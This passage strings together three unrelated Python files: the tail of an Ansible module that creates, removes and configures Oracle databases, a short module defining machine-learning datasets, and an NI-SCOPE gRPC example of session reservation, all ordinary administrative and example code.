        flsql = alterdb_sql + ' no force logging'
    if flashback:
        fbcomp = 'YES'
        fbsql = alterdb_sql + ' flashback on'
    else:
        fbcomp = 'NO'
        fbsql = alterdb_sql + ' flashback off'
    if def_tbs_type[0] != default_tablespace_type:
        deftbstypesql = 'alter database set default %s tablespace ' % default_tablespace_type
        change_db_sql.append(deftbstypesql)
    if default_tablespace is not None and def_tbs[0] != default_tablespace:
        deftbssql = 'alter database default tablespace %s' % default_tablespace
        change_db_sql.append(deftbssql)
    if default_temp_tablespace is not None and def_temp_tbs[0] != default_temp_tablespace:
        deftempsql = 'alter database default temporary tablespace %s' % default_temp_tablespace
        change_db_sql.append(deftempsql)
    if log_check_[0][0] != archcomp:
        change_restart_sql.append(archsql)
    if log_check_[0][1] != flcomp:
        change_db_sql.append(flsql)
    if log_check_[0][2] != fbcomp:
        change_db_sql.append(fbsql)
    if len(change_db_sql) > 0 or len(change_restart_sql) > 0:
        # Flashback database needs to be turned off before archivelog is turned off
        if log_check_[0][0] == 'ARCHIVELOG' and log_check_[0][2] == 'YES' and not archivelog and not flashback:
            if len(change_db_sql) > 0:  # <- Apply changes that does not require a restart
                apply_norestart_changes(module, change_db_sql)
            if len(change_restart_sql) > 0:  # <- Apply changes that requires a restart
                apply_restart_changes(module, oracle_home, db_name, db_unique_name, sid, instance_name, israc, archcomp,
                                      change_restart_sql)
        else:
            if len(change_restart_sql) > 0:  # <- Apply changes that requires a restart
                apply_restart_changes(module, oracle_home, db_name, db_unique_name, sid, instance_name, israc, archcomp,
                                      change_restart_sql)
            if len(change_db_sql) > 0:  # <- Apply changes that does not require a restart
                apply_norestart_changes(module, change_db_sql)
        msg = 'Database %s has been put in the intended state - Archivelog: %s, Force Logging: %s, Flashback: %s' % (
            db_name, archivelog, force_logging, flashback)
        module.exit_json(msg=msg, changed=True)
    else:
        if newdb:
            # Fix: message previously read 'successfully created created'.
            msg = 'Database %s successfully created (%s) ' % (db_name, archcomp)
            if output == 'verbose':
                msg += ' ,'.join(verboselist)
            changed = True
        else:
            msg = ' Database %s already exists and is in the intended state' \
                  ' - Archivelog: %s, Force Logging: %s, Flashback: %s' % (
                      db_name, archivelog, force_logging, flashback)
            changed = False
        module.exit_json(msg=msg, changed=changed)
def apply_restart_changes(module, oracle_home, db_name, db_unique_name, sid, instance_name, israc,
                          archcomp, change_restart_sql):
    """Stop the database, run the mount-state-only statements (e.g. archivelog
    mode changes) from a mounted instance, then bounce it back to full open."""
    if stop_db(module, oracle_home, db_name, db_unique_name, sid):
        if start_instance(module, oracle_home, db_name, db_unique_name, sid, 'mount', instance_name, israc):
            time.sleep(10)  # <- To allow the DB to register with the listener
            cursor = getconn(module)
            for sql in change_restart_sql:
                execute_sql(module, cursor, sql)
            if stop_db(module, oracle_home, db_name, db_unique_name, sid):
                if start_db(module, oracle_home, db_name, db_unique_name, sid):
                    if newdb:
                        msg = 'Database %s successfully created (%s) ' % (db_name, archcomp)
                        if output == 'verbose':
                            msg += ' ,'.join(verboselist)
                    else:
                        msg = 'Database %s has been put in the intended state - (%s) ' % (db_name, archcomp)
                        if output == 'verbose':
                            msg += ' ,'.join(verboselist)
                    # NOTE(review): msg is assembled here but never returned or
                    # passed to module.exit_json -- the caller (ensure_db_state)
                    # emits its own final message, so this value currently goes
                    # unused. Confirm before relying on it.
def apply_norestart_changes(module, change_db_sql):
    """Run each 'alter database' statement that can be applied with the DB open."""
    db_cursor = getconn(module)
    for statement in change_db_sql:
        execute_sql(module, db_cursor, statement)
def stop_db(module, oracle_home, db_name, db_unique_name, sid):
    """Shut the database down and return True on success (fails the module otherwise).

    Grid-Infrastructure-managed databases are stopped with
    'srvctl stop database -o immediate'; standalone ones with 'shutdown immediate'
    through a local sqlplus '/ as sysdba' session (ORACLE_SID is set from sid or
    db_name first).
    """
    if gimanaged:
        if db_unique_name is not None:
            db_name = db_unique_name
        command = '%s/bin/srvctl stop database -d %s -o immediate' % (oracle_home, db_name)
        (rc, stdout, stderr) = module.run_command(command)
        if rc != 0:
            msg = 'Error - STDOUT: %s, STDERR: %s, COMMAND: %s' % (stdout, stderr, command)
            module.fail_json(msg=msg, changed=False)
        else:
            return True
    else:
        if sid is not None:
            os.environ['ORACLE_SID'] = sid
        else:
            os.environ['ORACLE_SID'] = db_name
        shutdown_sql = '''
        connect / as sysdba
        shutdown immediate;
        exit
        '''
        sqlplus_bin = '%s/bin/sqlplus' % oracle_home
        p = subprocess.Popen([sqlplus_bin, '/nolog'], stdin=subprocess.PIPE,
                             stdout=subprocess.PIPE, stderr=subprocess.PIPE)
        (stdout, stderr) = p.communicate(shutdown_sql.encode('utf-8'))
        rc = p.returncode
        if rc != 0:
            msg = 'Error - STDOUT: %s, STDERR: %s, COMMAND: %s' % (stdout, stderr, shutdown_sql)
            module.fail_json(msg=msg, changed=False)
        else:
            return True
def start_db(module, oracle_home, db_name, db_unique_name, sid):
    """Start the database fully open and return True on success (fails the module
    otherwise). Uses 'srvctl start database' when GI-managed, else 'startup' via a
    local sqlplus '/ as sysdba' session with ORACLE_SID set from sid or db_name."""
    if gimanaged:
        if db_unique_name is not None:
            db_name = db_unique_name
        command = '%s/bin/srvctl start database -d %s' % (oracle_home, db_name)
        (rc, stdout, stderr) = module.run_command(command)
        if rc != 0:
            msg = 'Error - STDOUT: %s, STDERR: %s, COMMAND: %s' % (stdout, stderr, command)
            module.fail_json(msg=msg, changed=False)
        else:
            return True
    else:
        if sid is not None:
            os.environ['ORACLE_SID'] = sid
        else:
            os.environ['ORACLE_SID'] = db_name
        startup_sql = '''
        connect / as sysdba
        startup;
        exit
        '''
        sqlplus_bin = '%s/bin/sqlplus' % oracle_home
        p = subprocess.Popen([sqlplus_bin, '/nolog'], stdin=subprocess.PIPE,
                             stdout=subprocess.PIPE, stderr=subprocess.PIPE)
        (stdout, stderr) = p.communicate(startup_sql.encode('utf-8'))
        rc = p.returncode
        if rc != 0:
            msg = 'Error - STDOUT: %s, STDERR: %s, COMMAND: %s' % (stdout, stderr, startup_sql)
            module.fail_json(msg=msg, changed=False)
        else:
            return True
def start_instance(module, oracle_home, db_name, db_unique_name, sid, open_mode, instance_name, israc):
    """Start a single instance, optionally to a specific open mode.

    GI-managed: 'srvctl start instance' (RAC) or 'srvctl start database', with
    '-o <open_mode>' when given. Standalone: a local sqlplus session.
    NOTE(review): the sqlplus fallback hard-codes 'startup mount' and ignores the
    *open_mode* argument -- callers currently only pass 'mount', but confirm.
    """
    if gimanaged:
        if db_unique_name is not None:
            db_name = db_unique_name
        if israc:
            command = '%s/bin/srvctl start instance -d %s -i %s' % (oracle_home, db_name, instance_name)
        else:
            command = '%s/bin/srvctl start database -d %s ' % (oracle_home, db_name)
        if open_mode is not None:
            command += ' -o %s ' % open_mode
        (rc, stdout, stderr) = module.run_command(command)
        if rc != 0:
            msg = 'Error - STDOUT: %s, STDERR: %s, COMMAND: %s' % (stdout, stderr, command)
            module.fail_json(msg=msg, changed=False)
        else:
            return True
    else:
        if sid is not None:
            os.environ['ORACLE_SID'] = sid
        else:
            os.environ['ORACLE_SID'] = db_name
        startup_sql = '''
        connect / as sysdba
        startup mount;
        exit
        '''
        sqlplus_bin = '%s/bin/sqlplus' % oracle_home
        p = subprocess.Popen([sqlplus_bin, '/nolog'], stdin=subprocess.PIPE,
                             stdout=subprocess.PIPE, stderr=subprocess.PIPE)
        (stdout, stderr) = p.communicate(startup_sql.encode('utf-8'))
        rc = p.returncode
        if rc != 0:
            msg = 'Error - STDOUT: %s, STDERR: %s, COMMAND: %s' % (stdout, stderr, startup_sql)
            module.fail_json(msg=msg, changed=False)
        else:
            return True
def execute_sql_get(module, cursor, sql):
    """Execute *sql* on *cursor* and return all fetched rows.

    On a cx_Oracle DatabaseError the module run is failed with the Oracle error
    message (and False is returned, for completeness).
    """
    try:
        cursor.execute(sql)
        rows = cursor.fetchall()
    except cx_Oracle.DatabaseError as exc:
        error, = exc.args
        msg = 'Something went wrong while executing sql_get - %s sql: %s' % (error.message, sql)
        module.fail_json(msg=msg, changed=False)
        return False
    return rows
def execute_sql(module, cursor, sql):
    """Execute a non-query statement on *cursor*; return True on success.

    On a cx_Oracle DatabaseError the module run is failed with the Oracle error
    message (and False is returned, for completeness).
    """
    try:
        cursor.execute(sql)
    except cx_Oracle.DatabaseError as exc:
        error, = exc.args
        msg = 'Something went wrong while executing sql - %s sql: %s' % (error.message, sql)
        module.fail_json(msg=msg, changed=False)
        return False
    return True
def getconn(module):
    """Open a SYSDBA cx_Oracle connection and return a cursor on it.

    With neither user nor password set (module globals), an Oracle wallet
    connection ('/@service_name') is assumed; with both set, an Easy Connect DSN
    against the local machine is built. Exactly one of the two set is an error.
    """
    # Connects to the local machine's hostname, not the module 'hostname' param.
    hostname = os.uname()[1]
    wallet_connect = '/@%s' % service_name
    try:
        if not user and not password:  # If neither user or password is supplied, the use of an oracle wallet is assumed
            connect = wallet_connect
            conn = cx_Oracle.connect(wallet_connect, mode=cx_Oracle.SYSDBA)
        elif user and password:
            dsn = cx_Oracle.makedsn(host=hostname, port=port, service_name=service_name, )
            connect = dsn
            conn = cx_Oracle.connect(user, password, dsn, mode=cx_Oracle.SYSDBA)
        elif not user or not password:
            module.fail_json(msg='Missing username or password for cx_Oracle')
    except cx_Oracle.DatabaseError as exc:
        error, = exc.args
        msg = 'Could not connect to database - %s, connect descriptor: %s' % (error.message, connect)
        module.fail_json(msg=msg, changed=False)
    cursor = conn.cursor()
    return cursor
def main():
    """Ansible entry point: parse parameters, then create, remove or start the
    database, or converge an already-existing one to the requested state."""
    # NOTE(review): msg starts as a one-element list but is later rebound to
    # plain strings; the initial list value is only used if an early failure
    # path passes it through unchanged.
    msg = ['']
    global gimanaged
    global major_version
    global user
    global password
    global service_name
    global hostname
    global port
    global israc
    global newdb
    global output
    global verbosemsg
    global verboselist
    verbosemsg = ''
    verboselist = []
    newdb = False
    module = AnsibleModule(
        argument_spec=dict(
            oracle_home=dict(default=None, aliases=['oh']),
            db_name=dict(required=True, aliases=['db', 'database_name', 'name']),
            sid=dict(required=False),
            db_unique_name=dict(required=False, aliases=['dbunqn', 'unique_name']),
            sys_password=dict(required=False, no_log=True, aliases=['syspw', 'sysdbapassword', 'sysdbapw']),
            system_password=dict(required=False, no_log=True, aliases=['systempw']),
            dbsnmp_password=dict(required=False, no_log=True, aliases=['dbsnmppw']),
            responsefile=dict(required=False),
            template=dict(default='General_Purpose.dbc'),
            cdb=dict(default=False, type='bool', aliases=['container']),
            local_undo=dict(default=True, type='bool'),
            datafile_dest=dict(required=False, aliases=['dfd']),
            recoveryfile_dest=dict(required=False, aliases=['rfd']),
            storage_type=dict(default='FS', aliases=['storage'], choices=['FS', 'ASM']),
            dbconfig_type=dict(default='SI', choices=['SI', 'RAC', 'RACONENODE']),
            db_type=dict(default='MULTIPURPOSE', choices=['MULTIPURPOSE', 'DATA_WAREHOUSING', 'OLTP']),
            racone_service=dict(required=False, aliases=['ron_service']),
            characterset=dict(default='AL32UTF8'),
            memory_percentage=dict(required=False),
            memory_totalmb=dict(default='1024'),
            nodelist=dict(required=False, type='list'),
            amm=dict(default=False, type='bool', aliases=['automatic_memory_management']),
            initparams=dict(required=False, type='list'),
            customscripts=dict(required=False, type='list'),
            default_tablespace_type=dict(default='smallfile', choices=['smallfile', 'bigfile']),
            default_tablespace=dict(required=False),
            default_temp_tablespace=dict(required=False),
            archivelog=dict(default=False, type='bool'),
            force_logging=dict(default=False, type='bool'),
            flashback=dict(default=False, type='bool'),
            datapatch=dict(default=True, type='bool'),
            output=dict(default="short", choices=["short", "verbose"]),
            state=dict(default="present", choices=["present", "absent", "started"]),
            hostname=dict(required=False, default='localhost', aliases=['host']),
            port=dict(required=False, default=1521),
        ),
        mutually_exclusive=[['memory_percentage', 'memory_totalmb']]
    )
    oracle_home = module.params["oracle_home"]
    db_name = module.params["db_name"]
    sid = module.params["sid"]
    db_unique_name = module.params["db_unique_name"]
    sys_password = module.params["sys_password"]
    system_password = module.params["system_password"]
    dbsnmp_password = module.params["dbsnmp_password"]
    responsefile = module.params["responsefile"]
    template = module.params["template"]
    cdb = module.params["cdb"]
    local_undo = module.params["local_undo"]
    datafile_dest = module.params["datafile_dest"]
    recoveryfile_dest = module.params["recoveryfile_dest"]
    storage_type = module.params["storage_type"]
    dbconfig_type = module.params["dbconfig_type"]
    racone_service = module.params["racone_service"]
    characterset = module.params["characterset"]
    memory_percentage = module.params["memory_percentage"]
    memory_totalmb = module.params["memory_totalmb"]
    nodelist = module.params["nodelist"]
    db_type = module.params["db_type"]
    amm = module.params["amm"]
    initparams = module.params["initparams"]
    customscripts = module.params["customscripts"]
    default_tablespace_type = module.params["default_tablespace_type"]
    default_tablespace = module.params["default_tablespace"]
    default_temp_tablespace = module.params["default_temp_tablespace"]
    archivelog = module.params["archivelog"]
    force_logging = module.params["force_logging"]
    flashback = module.params["flashback"]
    output = module.params["output"]
    state = module.params["state"]
    hostname = module.params["hostname"]
    port = module.params["port"]
    # ld_library_path = '%s/lib' % (oracle_home)
    # Resolve ORACLE_HOME: module parameter wins, then the environment.
    if oracle_home is not None:
        os.environ['ORACLE_HOME'] = oracle_home.rstrip('/')
        # os.environ['LD_LIBRARY_PATH'] = ld_library_path
    elif 'ORACLE_HOME' in os.environ:
        oracle_home = os.environ['ORACLE_HOME']
        # ld_library_path = os.environ['LD_LIBRARY_PATH']
    else:
        msg = 'ORACLE_HOME variable not set. Please set it and re-run the command'
        module.fail_json(msg=msg, changed=False)
    # Decide whether to use srvctl or sqlplus
    # (presence of the Oracle Local Registry marks a Grid Infrastructure host)
    if os.path.exists('/etc/oracle/olr.loc'):
        gimanaged = True
    else:
        gimanaged = False
    if not cx_oracle_exists:
        msg = "The cx_Oracle module is required. 'pip install cx_Oracle' should do the trick." \
              " If cx_Oracle is installed, make sure ORACLE_HOME & LD_LIBRARY_PATH is set"
        module.fail_json(msg=msg)
    # Connection details for database
    user = 'sys'
    password = sys_password
    if db_unique_name is not None:
        service_name = db_unique_name
    else:
        service_name = db_name
    # Get the Oracle version
    major_version = get_version(module, oracle_home)
    if state == 'started':
        msg = "oracle_home: %s db_name: %s sid: %s db_unique_name: %s" % (oracle_home, db_name, sid, db_unique_name)
        if not check_db_exists(module, oracle_home, db_name, sid, db_unique_name):
            msg = "Database not found. %s" % msg
            module.fail_json(msg=msg, changed=False)
        else:
            if start_db(module, oracle_home, db_name, db_unique_name, sid):
                msg = "Database started."
                module.exit_json(msg=msg, changed=True)
            else:
                msg = "Startup failed. %s" % msg
                module.fail_json(msg=msg, changed=False)
    elif state == 'present':
        if not check_db_exists(module, oracle_home, db_name, sid, db_unique_name):
            if create_db(module, oracle_home, sys_password, system_password, dbsnmp_password, db_name, sid,
                         db_unique_name, responsefile, template, cdb, local_undo, datafile_dest, recoveryfile_dest,
                         storage_type, dbconfig_type, racone_service, characterset, memory_percentage, memory_totalmb,
                         nodelist, db_type, amm, initparams, customscripts):
                newdb = True
                ensure_db_state(module, oracle_home, db_name, db_unique_name, sid, archivelog, force_logging,
                                flashback, default_tablespace_type, default_tablespace, default_temp_tablespace)
            else:
                module.fail_json(msg=msg, changed=False)
        else:
            ensure_db_state(module, oracle_home, db_name, db_unique_name, sid, archivelog, force_logging,
                            flashback, default_tablespace_type, default_tablespace, default_temp_tablespace)
    elif state == 'absent':
        if check_db_exists(module, oracle_home, db_name, sid, db_unique_name):
            if remove_db(module, msg, oracle_home, db_name, sid, db_unique_name, sys_password):
                msg = 'Successfully removed database %s' % db_name
                module.exit_json(msg=msg, changed=True)
            else:
                module.fail_json(msg=msg, changed=False)
        else:
            msg = 'Database %s doesn\'t exist' % db_name
            module.exit_json(msg=msg, changed=False)
    module.exit_json(msg="Unhandled exit", changed=False)
# Standard Ansible module entry point.
if __name__ == '__main__':
    main()
|
from pathlib import Path
from .dataset import Dataset
from .. import data
# Resolve the bundled data directory once instead of recomputing
# Path(data.__file__).parent.resolve() for every dataset below.
_DATA_DIR = Path(data.__file__).parent.resolve()

# Binary-classification datasets: each loads from its subdirectory of the
# package data directory; bias = -1 adds the constant bias input used by
# the perceptron-style models.
logic_gate_and = Dataset('logic_gate_and', _DATA_DIR / 'logic_gate_and', bias=-1)
logic_gate_or = Dataset('logic_gate_or', _DATA_DIR / 'logic_gate_or', bias=-1)
logic_gate_xor = Dataset('logic_gate_xor', _DATA_DIR / 'logic_gate_xor', bias=-1)
blood_transfusion = Dataset('blood_transfusion', _DATA_DIR / 'blood_transfusion', bias=-1)
cryotherapy = Dataset('cryotherapy', _DATA_DIR / 'cryotherapy', bias=-1)
diabetes = Dataset('diabetes', _DATA_DIR / 'diabetes', bias=-1)
tic_tac_toe_endgame = Dataset('tic_tac_toe_endgame', _DATA_DIR / 'tic_tac_toe_endgame', bias=-1)
# 2-D embedding dataset with integer labels rather than a bias input.
tsne_2d = Dataset('tsne_2d', _DATA_DIR / 'tsne_2d', output_type=int)
|
#
# This example initiates a session and uses the session API to exercise some common reservation operations on the session.
# This particular example is using NI-SCOPE but the session reservation API should work for any driver session.
#
# The gRPC API is built from the C API. NI-SCOPE documentation is installed with the driver at:
# C:\Program Files (x86)\IVI Foundation\IVI\Drivers\niScope\Documentation\English\Digitizers.chm
#
# A version of this .chm is available online at:
# Link: https://zone.ni.com/reference/en-XX/help/370592AB-01/
#
# Getting Started:
#
# To run this example, install "NI-SCOPE Driver" on the server machine.
# Link : https://www.ni.com/en-us/support/downloads/drivers/download.ni-scope.html
#
# For instructions on how to use protoc to generate gRPC client interfaces, see our "Creating a gRPC Client" wiki page.
# Link: https://github.com/ni/grpc-device/wiki/Creating-a-gRPC-Client
#
# Refer to the NI-SCOPE gRPC Wiki to determine the valid channel and resource names for your NI-SCOPE module.
# Link : https://github.com/ni/grpc-device/wiki/NI-SCOPE-C-Function-Reference
#
#
# Running from command line:
#
# Server machine's IP address, port number, and resource name can be passed as separate command line arguments.
# > python session-reservation.py <server_address> <port_number> <resource_name>
# If they are not passed in as command line arguments, then by default the server address will be "localhost:31763", with "SimulatedScope" as the resource name
import grpc
import sys
import time
import niscope_pb2 as niscope_types
import niscope_pb2_grpc as grpc_niscope
import session_pb2 as session_types
import session_pb2_grpc as grpc_session
# Default server endpoint; both can be overridden by command-line arguments.
server_address = "localhost"
server_port = "31763"
# Resource name and options for a simulated 5164 client. Change them according to the NI-SCOPE model.
resource = "SimulatedScope"
options = "Simulate=1, DriverSetup=Model:5164; BoardType:PXIe"
# Reservation client identifiers used to demonstrate the session-reservation API.
client_1_id = "Client1"
client_2_id = "Client2"
# Latch so that only the first NI-SCOPE error is raised (see CheckForError).
any_error = False
# Checks for errors. If any, throws an exception to stop the execution.
def CheckForError(vi, status):
    """Raise (via ThrowOnError) on the first non-zero NI-SCOPE status code."""
    global any_error
    # Only the first failure is reported; zero status and later calls are no-ops.
    if status == 0 or any_error:
        return
    any_error = True
    ThrowOnError(vi, status)
# Converts an error code returned by NI-SCOPE into a user-readable string.
def ThrowOnError(vi, error_code):
    """Look up *error_code* on the server and raise it as a Python Exception."""
    request = niscope_types.GetErrorMessageRequest(
        vi=vi,
        error_code=error_code
    )
    response = niscope_client.GetErrorMessage(request)
    raise Exception(response.error_message)
# Read in cmd args
if len(sys.argv) >= 2:
    server_address = sys.argv[1]
if len(sys.argv) >= 3:
    server_port = sys.argv[2]
if len(sys.argv) >= 4:
    resource = sys.argv[3]
    # A real resource name was supplied, so drop the simulation options.
    options = ""
# Create the communication channel for the remote host and create connections to the NI-SCOPE and session services.
channel = grpc.insecure_channel(f"{server_address}:{server_port}")
niscope_client = grpc_niscope.NiScopeStub(channel)
session_client = grpc_session.SessionUtilitiesStub(channel)
# Demonstration flow: initialize a session, then exercise reserve / check /
# unreserve / re-reserve and a final server reset.
try:
    # Reset server to start in a fresh state.
    reset_server_response = session_client.ResetServer(session_types.ResetServerRequest())
    assert(reset_server_response.is_server_reset)

    # Open session to NI-SCOPE module with options.
    session_name = "NI-Scope-Session-1"
    print('\nInitializing session...')
    init_with_options_response = niscope_client.InitWithOptions(niscope_types.InitWithOptionsRequest(
        session_name = session_name,
        resource_name = resource,
        id_query = False,
        option_string = options
    ))
    vi = init_with_options_response.vi
    CheckForError(vi, init_with_options_response.status)
    print(f'Session initialized with name {session_name} and id {vi.id}.\n')

    # Check if session is reserved by client 1.
    # Note: The reservation_id is defined by and has meaning only for the client + Session Reservation API.
    print(f'Checking if {session_name} is reserved by {client_1_id}...')
    is_reserved_response = session_client.IsReservedByClient(session_types.IsReservedByClientRequest(
        reservation_id = session_name,
        client_id = client_1_id
    ))
    assert(not is_reserved_response.is_reserved)
    print(f'{session_name} is not reserved by {client_1_id}.\n')

    # Reserve session for client 1.
    print(f'Reserving {session_name} for {client_1_id}...')
    reserve_response = session_client.Reserve(session_types.ReserveRequest(
        reservation_id = session_name,
        client_id = client_1_id
    ))
    is_reserved = reserve_response.is_reserved
    assert(is_reserved)
    is_reserved_by_client1_response = session_client.IsReservedByClient(session_types.IsReservedByClientRequest(
        reservation_id = session_name,
        client_id = client_1_id
    ))
    assert(is_reserved_by_client1_response.is_reserved)
    print(f'{session_name} is reserved by {client_1_id}.\n')

    # Check reservation on client 2.
    print(f'Checking if {session_name} is reserved by {client_2_id}...')
    is_reserved_by_client2_response = session_client.IsReservedByClient(session_types.IsReservedByClientRequest(
        reservation_id = session_name,
        client_id = client_2_id
    ))
    assert(not is_reserved_by_client2_response.is_reserved)
    print(f'{session_name} is not reserved by {client_2_id}.\n')

    # Unreserve on client 1.
    print(f'Unreserving {session_name} reserved by {client_1_id}...')
    is_unreserved_response = session_client.Unreserve(session_types.UnreserveRequest(
        reservation_id = session_name,
        client_id = client_1_id
    ))
    assert(is_unreserved_response.is_unreserved)
    is_reserved_by_client1_response = session_client.IsReservedByClient(session_types.IsReservedByClientRequest(
        reservation_id = session_name,
        client_id = client_1_id
    ))
    assert(not is_reserved_by_client1_response.is_reserved)
    print(f'{session_name} is no longer reserved by {client_1_id}.\n')

    # Now the freed session can be reserved by client 2.
    print(f'Reserving {session_name} for {client_2_id}...')
    reserve_response = session_client.Reserve(session_types.ReserveRequest(
        reservation_id = session_name,
        client_id = client_2_id
    ))
    is_reserved = reserve_response.is_reserved
    assert(is_reserved)
    is_reserved_by_client2_response = session_client.IsReservedByClient(session_types.IsReservedByClientRequest(
        reservation_id = session_name,
        client_id = client_2_id
    ))
    assert(is_reserved_by_client2_response.is_reserved)
    print(f'{session_name} is reserved by {client_2_id}.\n')

    # Reset server.
    print(f'Resetting the server...')
    reset_server_response = session_client.ResetServer(session_types.ResetServerRequest())
    assert(reset_server_response.is_server_reset)
    is_reserved_by_client2_response = session_client.IsReservedByClient(session_types.IsReservedByClientRequest(
        reservation_id = session_name,
        client_id = client_2_id
    ))
    assert(not is_reserved_by_client2_response.is_reserved)
    print(f'All sessions have been closed and reservations have been cleared.\n')

# If NI-SCOPE API or Session API throws an exception, print the error message.
except grpc.RpcError as rpc_error:
    error_message = rpc_error.details()
    if rpc_error.code() == grpc.StatusCode.UNAVAILABLE:
        error_message = f"Failed to connect to server on {server_address}:{server_port}"
    elif rpc_error.code() == grpc.StatusCode.UNIMPLEMENTED:
        error_message = "The operation is not implemented or is not supported/enabled in this service"
    print(f"{error_message}")
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.